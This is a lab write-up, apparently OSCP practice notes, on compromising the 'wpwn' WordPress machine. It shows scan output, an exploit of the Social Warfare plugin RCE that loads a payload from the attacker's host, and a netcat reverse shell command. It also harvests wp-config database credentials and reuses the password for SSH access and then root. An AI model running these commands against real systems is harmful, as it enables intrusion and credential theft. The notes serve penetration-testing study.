O
O
OSCP Notes
Search
K
Comment on page

wpwn

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
| 256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_ 256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Upon dirsearch, I've found a wordpress login page.
wpscan --url http://192.168.140.123/wordpress/ --api-token 5Bv7irDgKEpTvFnZC1ZeuYbBzkTprSA0Wdwqz8TT0no
WordPress version 5.5
[+] social-warfare
| Location: http://192.168.140.123/wordpress/wp-content/plugins/social-warfare/
| Last Updated: 2021-07-20T16:09:00.000Z
| [!] The version is out of date, the latest version is 4.3.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Comment (Passive Detection)
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Arbitrary Settings Update
| Fixed in: 3.5.3
| References:
| - https://wpscan.com/vulnerability/32085d2d-1235-42b4-baeb-bc43172a4972
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9978
| - https://wordpress.org/support/topic/malware-into-new-update/
| - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/
| - https://threatpost.com/wordpress-plugin-removed-after-zero-day-discovered/143051/
| - https://twitter.com/warfareplugins/status/1108826025188909057
| - https://www.wordfence.com/blog/2019/03/recent-social-warfare-vulnerability-allowed-remote-code-execution/
|
| [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)
| Fixed in: 3.5.3
| References:
| - https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618
| - https://www.webarxsecurity.com/social-warfare-vulnerability/
|
| Version: 3.5.2 (100% confidence)
| Found By: Comment (Passive Detection)
| - http://192.168.140.123/wordpress/, Match: 'Social Warfare v3.5.2'
| Confirmed By:
| Query Parameter (Passive Detection)
| - http://192.168.140.123/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.2
| - http://192.168.140.123/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.2
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.140.123/wordpress/wp-content/plugins/social-warfare/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.140.123/wordpress/wp-content/plugins/social-warfare/readme.txt
RCE looks interesting.
Found the exploit locally.
I read about the exploit here: https://wpscan.com/vulnerability/9259
Created a simple payload to read a /etc/passwd file
and executed the following command:
python wprce.py -t http://192.168.140.123/wordpress/ --payload-uri http://192.168.49.140/payload.txt
It worked!
Now let's note the usernames:
www-data, takis, and root are the valid usernames ---could bruteforce ssh later.
used the netcat reverse shell
nc -e /bin/sh 192.168.49.140 4444
anddd we got a reverse shell as www-data!!!
Priv esc:
wordpress config
QL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );
/** MySQL database username */
define( 'DB_USER', 'wp_user' );
/** MySQL database password */
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );
mysql -u wp_user -e -p 'R3&]vzhHmMn9,:-5' "SHOW VERSION();"
mysql -u root -e "SHOW VERSION();"
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '$bDhwe@ aW2=HmnqU6GU:#uE.Zfk-?;_:u.Q][{Xi0Z_k,+#nxnI[TNl2YB[<[cI' );
define( 'SECURE_AUTH_KEY', '0D#hUv0AK{@zD -S[tO/@x2ZqEUb6H~7dU}|qon*o9To(!25rn25=^RnE83}czwx' );
define( 'LOGGED_IN_KEY', '_.sLFXmT yAhC!QUo8.NXNm]l~}1m5{uWse59w)<PML i4PQX50f{wh%(Hr|qThu' );
define( 'NONCE_KEY', '3TG=HS42u(X7s6.WUIeQ{@P$w(:]7.]Gmtk`ZlH5.`zAmU0K},(Z^srahRcNIUQY' );
define( 'AUTH_SALT', '<i1,O4cg-nF0$uzV08?YgCVyx/Pe!bUZ!WZ$uLfQSHW8[0:%{GRP19D.%rvA!<}P' );
define( 'SECURE_AUTH_SALT', 'qNuof_(c=U36P(7jk4#l3bKoMJA9tHz(F!U-X;wQz8,In,:8*F^WNHB}^I`0Cs][' );
define( 'LOGGED_IN_SALT', '}%].&sH`s8IBlb+iebj*Cp8:9#ctz{Py_d_O-OkAF|K;r(IH}6P7y;v{DXG*#N>W' );
define( 'NONCE_SALT', ':<^2H)#:@7|lQP.M2FFL!+H1M&]nri4~)^6f/u&k|Bl$!xq2)@<jeZacZ8&mrpV}' );
password
Time to do enum!
scp apt.extended_states.1.gz [email protected]:/tmp
/var/www/html/wordpress/wp-includes/class-snoopy.php: // $cookies["username"]="joe";
/var/www/html/wordpress/wp-content/themes/twentytwenty/package-lock.json: "parse-passwd": "^1.0.0"
/var/www/html/wordpress/wp-content/themes/twentytwenty/package-lock.json: "integrity": "sha1-DTM+PwDqxQqhRUq9MO+MKl2ackI=",
/etc/ssl/openssl.cnf:# input_password = secret
/etc/ssl/openssl.cnf:# output_password = secret
/etc/ssl/openssl.cnf:challengePassword = A challenge password
/etc/ssl/openssl.cnf:challengePassword_max = 20
/etc/ssl/openssl.cnf:challengePassword_min = 4
/etc/apache2/sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA'.
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
Enumerating mySQL with creds:
mysql -u wp_user -e -p 'R3&]vzhHmMn9,:-5' "SHOW VERSION();"
mysql -u root -e -p 'R3&]vzhHmMn9,:-5' "SHOW VERSION();"
so.... just before I started enumerating the service, I realized the I tried to ssh to takis account with the password before the comma...
Now we are in takis...!!!
And.. simple sudo -l gave me a root shell!
This one was just like Alpha!